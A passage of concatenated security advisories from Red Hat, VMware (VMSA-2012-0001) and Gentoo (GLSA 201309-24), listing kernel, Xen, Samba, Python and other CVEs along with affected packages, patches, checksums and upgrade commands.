Page Tables (EPT) or AMD\nVirtualization (AMD-V) Rapid Virtualization Indexing (RVI), a privileged\nguest user could trigger this flaw to cause the hypervisor to crash. \n(CVE-2011-2519, Moderate)\n\n* A flaw in the __addr_ok() macro in the Linux kernel\u0027s Xen hypervisor\nimplementation when running on 64-bit systems could allow a privileged\nguest user to crash the hypervisor. (CVE-2011-2901, Moderate)\n\n* /proc/[PID]/io is world-readable by default. Previously, these files\ncould be read without any further restrictions. A local, unprivileged user\ncould read these files, belonging to other, possibly privileged processes\nto gather confidential information, such as the length of a password used\nin a process. (CVE-2011-2495, Low)\n\nRed Hat would like to thank Vasily Averin for reporting CVE-2011-2491, and\nVasiliy Kulikov of Openwall for reporting CVE-2011-2495. \n\nThis update also fixes the following bugs:\n\n* On Broadcom PCI cards that use the tg3 driver, the operational state of a\nnetwork device, represented by the value in\n\"/sys/class/net/ethX/operstate\", was not initialized by default. \nConsequently, the state was reported as \"unknown\" when the tg3 network\ndevice was actually in the \"up\" state. This update modifies the tg3 driver\nto properly set the operstate value. (BZ#744699)\n\n* A KVM (Kernel-based Virtual Machine) guest can get preempted by the host,\nwhen a higher priority process needs to run. When a guest is not running\nfor several timer interrupts in a row, ticks could be lost, resulting in\nthe jiffies timer advancing slower than expected and timeouts taking longer\nthan expected. To correct for the issue of lost ticks,\ndo_timer_tsc_timekeeping() checks a reference clock source (kvm-clock when\nrunning as a KVM guest) to see if timer interrupts have been missed. If so,\njiffies is incremented by the number of missed timer interrupts, ensuring\nthat programs are woken up on time. (BZ#747874)\n\n* When a block device object was allocated, the bd_super field was not\nbeing explicitly initialized to NULL. Previously, users of the block device\nobject could set bd_super to NULL when the object was released by calling\nthe kill_block_super() function. Certain third-party file systems do not\nalways use this function, and bd_super could therefore become uninitialized\nwhen the object was allocated again. This could cause a kernel panic in the\nblkdev_releasepage() function, when the uninitialized bd_super field was\ndereferenced. Now, bd_super is properly initialized in the bdget()\nfunction, and the kernel panic no longer occurs. (BZ#751137)\n\n4. Solution:\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. The system must be\nrebooted for this update to take effect. \n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not\nuse \"rpm -Uvh\" as that will remove the running kernel binaries from\nyour system. You may use \"rpm -e\" to remove old kernels after\ndetermining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):\n\n709393 - CVE-2011-2491 kernel: rpc task leak after flock()ing  NFS share\n714867 - CVE-2011-2482 kernel: sctp dos\n716825 - CVE-2011-2495 kernel: /proc/PID/io infoleak\n718152 - CVE-2011-2517 kernel: nl80211: missing check for valid SSID size in scan operations\n718882 - CVE-2011-2519 kernel: xen: x86_emulate: fix SAHF emulation\n728042 - CVE-2011-2901 kernel: xen: off-by-one shift in x86_64 __addr_ok()\n\n6. Package List:\n\nRed Hat Enterprise Linux EUS (v. 5.6 server):\n\nSource:\nkernel-2.6.18-238.31.1.el5.src.rpm\n\ni386:\nkernel-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-PAE-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.i686.rpm\nkernel-devel-2.6.18-238.31.1.el5.i686.rpm\nkernel-headers-2.6.18-238.31.1.el5.i386.rpm\nkernel-xen-2.6.18-238.31.1.el5.i686.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.i686.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.i686.rpm\n\nia64:\nkernel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.ia64.rpm\nkernel-devel-2.6.18-238.31.1.el5.ia64.rpm\nkernel-headers-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.ia64.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.ia64.rpm\n\nnoarch:\nkernel-doc-2.6.18-238.31.1.el5.noarch.rpm\n\nppc:\nkernel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-devel-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-headers-2.6.18-238.31.1.el5.ppc.rpm\nkernel-headers-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-debuginfo-2.6.18-238.31.1.el5.ppc64.rpm\nkernel-kdump-devel-2.6.18-238.31.1.el5.ppc64.rpm\n\ns390x:\nkernel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.s390x.rpm\nkernel-devel-2.6.18-238.31.1.el5.s390x.rpm\nkernel-headers-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-debuginfo-2.6.18-238.31.1.el5.s390x.rpm\nkernel-kdump-devel-2.6.18-238.31.1.el5.s390x.rpm\n\nx86_64:\nkernel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debug-devel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-debuginfo-common-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-devel-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-headers-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-debuginfo-2.6.18-238.31.1.el5.x86_64.rpm\nkernel-xen-devel-2.6.18-238.31.1.el5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-2482.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2491.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2495.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2517.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2519.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-2901.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n ----------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID: VMSA-2012-0001\nSynopsis:    VMware ESXi and ESX updates to third party library\n             and ESX Service Console\nIssue date:  2012-01-30\nUpdated on:  2012-01-30 (initial advisory)\n\nCVE numbers: --- COS Kernel ---\n             CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n             CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,\n             CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,\n             CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,\n             CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n             CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,\n             CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,\n             CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,\n             CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n             CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,\n             CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,\n             CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,\n             CVE-2011-2519, CVE-2011-2901\n             --- COS cURL ---\n             CVE-2011-2192\n             --- COS rpm ---\n             CVE-2010-2059, CVE-2011-3378\n             --- COS samba ---\n             CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n             CVE-2011-2522, CVE-2011-2694\n             --- COS python ---\n             CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,\n             CVE-2011-1521\n             --- python library ---\n             CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n             CVE-2010-2089, CVE-2011-1521\n ----------------------------------------------------------------------\n\n1. Summary\n\n   VMware ESXi and ESX updates to third party library and ESX Service\n   Console address several security issues. \n\n2. Relevant releases\n\n   ESXi 4.1 without patch ESXi410-201201401-SG\n\n   ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,\n                           ESX410-201201404-SG, ESX410-201201405-SG,\n                           ESX410-201201406-SG, ESX410-201201407-SG\n\n3. Problem Description\n\n a. ESX third party update for Service Console kernel\n\n    The ESX Service Console Operating System (COS) kernel is updated to\n    kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the\n    COS kernel. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n    CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,\n    CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,\n    CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n    CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,\n    CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,\n    CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n    CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,\n    CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,\n    CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201401-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. ESX third party update for Service Console cURL RPM\n\n    The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9\n    resolving a security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the name CVE-2011-2192 to this issue. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201402-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. ESX third party update for Service Console nspr and nss RPMs\n\n    The ESX Service Console (COS) nspr and nss RPMs are updated to\n    nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving\n    a security issues. \n\n    A Certificate Authority (CA) issued fraudulent SSL certificates and\n    Netscape Portable Runtime (NSPR) and Network Security Services (NSS)\n    contain the built-in tokens of this fraudulent Certificate\n    Authority. This update renders all SSL certificates signed by the\n    fraudulent CA as untrusted for all uses. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201404-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n d. ESX third party update for Service Console rpm RPMs\n\n    The ESX Service Console Operating System (COS) rpm packages are\n    updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,\n    rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2\n    which fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201406-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n e. ESX third party update for Service Console samba RPMs\n\n    The ESX Service Console Operating System (COS) samba packages are\n    updated to samba-client-3.0.33-3.29.el5_7.4,\n    samba-common-3.0.33-3.29.el5_7.4 and\n    libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security\n    issues in the Samba client. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n    CVE-2011-2522 and CVE-2011-2694 to these issues. \n\n    Note that ESX does not include the Samba Web Administration Tool\n    (SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and\n    CVE-2011-2694. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201407-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n f. ESX third party update for Service Console python package\n\n    The ESX Service Console (COS) python package is updated to\n    2.4.3-44 which fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and\n    CVE-2011-1521 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201405-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n g. ESXi update to third party component python\n\n    The python third party library is updated to python 2.5.6 which\n    fixes multiple security issues. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org) has\n    assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n    CVE-2010-2089, and CVE-2011-1521 to these issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           5.0       ESXi     patch pending\n    ESXi           4.1       ESXi     ESXi410-201201401-SG\n    ESXi           4.0       ESXi     patch pending\n    ESXi           3.5       ESXi     patch pending\n\n    ESX            4.1       ESX      not affected\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware ESXi 4.1\n   ---------------\n   ESXi410-201201401\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: BDF86F10A973346E26C9C2CD4C424E88    \n   sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F\n   http://kb.vmware.com/kb/2009143\n   ESXi410-201201401 contains ESXi410-201201401-SG\n\n   VMware ESX 4.1\n   --------------\n   ESX410-201201001\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F    \n   sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC\n   http://kb.vmware.com/kb/2009142\n\n   ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,\n   ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and\n   ESX410-201201407-SG\n\n5. References\n\n   CVE numbers\n\n   --- COS Kernel ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901\n   --- COS cURL ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192\n   --- COS rpm ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378\n   --- COS samba ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694\n   --- COS python ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n   --- python library ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n\n ----------------------------------------------------------------------\n\n6. Change log\n\n   2012-01-30 VMSA-2012-0001\n   Initial security advisory in conjunction with the release of patches\n   for ESX 4.1 and ESXi 4.1 on 2012-01-30. \n\n ----------------------------------------------------------------------\n\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2012 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.8.3 (Build 4028)\nCharset: utf-8\n\nwj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8\nf2pLxi537s+ew4dvnYNWlJ8=\n=OAh4\n-----END PGP SIGNATURE-----\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 201309-24\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                            http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n    Title: Xen: Multiple vulnerabilities\n     Date: September 27, 2013\n     Bugs: #385319, #386371, #420875, #431156, #454314, #464724,\n           #472214, #482860\n       ID: 201309-24\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Xen, allowing attackers on\na Xen Virtual Machine to execute arbitrary code, cause Denial of\nService, or gain access to data on the host. \n\nBackground\n==========\n\nXen is a bare-metal hypervisor. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/xen           \u003c 4.2.2-r1               \u003e= 4.2.2-r1\n  2  app-emulation/xen-tools     \u003c 4.2.2-r3               \u003e= 4.2.2-r3\n  3  app-emulation/xen-pvgrub\n                                 \u003c 4.2.2-r1               \u003e= 4.2.2-r1\n    -------------------------------------------------------------------\n     3 affected packages\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in Xen. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n======\n\nGuest domains could possibly gain privileges, execute arbitrary code,\nor cause a Denial of Service on the host domain (Dom0). Additionally,\nguest domains could gain information about other virtual machines\nrunning on the same host or read arbitrary files on the host. \n\nWorkaround\n==========\n\nThe CVEs listed below do not currently have fixes, but only apply to\nXen setups which have \"tmem\" specified on the hypervisor command line. \nTMEM is not currently supported for use in production systems, and\nadministrators using tmem should disable it. \nRelevant CVEs:\n* CVE-2012-2497\n* CVE-2012-6030\n* CVE-2012-6031\n* CVE-2012-6032\n* CVE-2012-6033\n* CVE-2012-6034\n* CVE-2012-6035\n* CVE-2012-6036\n\nResolution\n==========\n\nAll Xen users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-emulation/xen-4.2.2-r1\"\n\nAll Xen-tools users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot -v \"\u003e=app-emulation/xen-tools-4.2.2-r3\"\n\nAll Xen-pvgrub users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot -v \"\u003e=app-emulation/xen-pvgrub-4.2.2-r1\"\n\nReferences\n==========\n\n[  1 ] CVE-2011-2901\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2901\n[  2 ] CVE-2011-3262\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262\n[  3 ] CVE-2011-3262\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3262\n[  4 ] CVE-2012-0217\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0217\n[  5 ] CVE-2012-0218\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0218\n[  6 ] CVE-2012-2934\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2934\n[  7 ] CVE-2012-3432\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3432\n[  8 ] CVE-2012-3433\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3433\n[  9 ] CVE-2012-3494\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3494\n[ 10 ] CVE-2012-3495\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3495\n[ 11 ] CVE-2012-3496\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3496\n[ 12 ] CVE-2012-3497\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3497\n[ 13 ] CVE-2012-3498\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3498\n[ 14 ] CVE-2012-3515\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3515\n[ 15 ] CVE-2012-4411\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4411\n[ 16 ] CVE-2012-4535\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4535\n[ 17 ] CVE-2012-4536\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4536\n[ 18 ] CVE-2012-4537\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4537\n[ 19 ] CVE-2012-4538\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4538\n[ 20 ] CVE-2012-4539\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4539\n[ 21 ] CVE-2012-5510\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5510\n[ 22 ] CVE-2012-5511\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5511\n[ 23 ] CVE-2012-5512\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5512\n[ 24 ] CVE-2012-5513\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5513\n[ 25 ] CVE-2012-5514\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5514\n[ 26 ] CVE-2012-5515\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5515\n[ 27 ] CVE-2012-5525\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5525\n[ 28 ] CVE-2012-5634\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5634\n[ 29 ] CVE-2012-6030\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6030\n[ 30 ] CVE-2012-6031\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6031\n[ 31 ] CVE-2012-6032\n       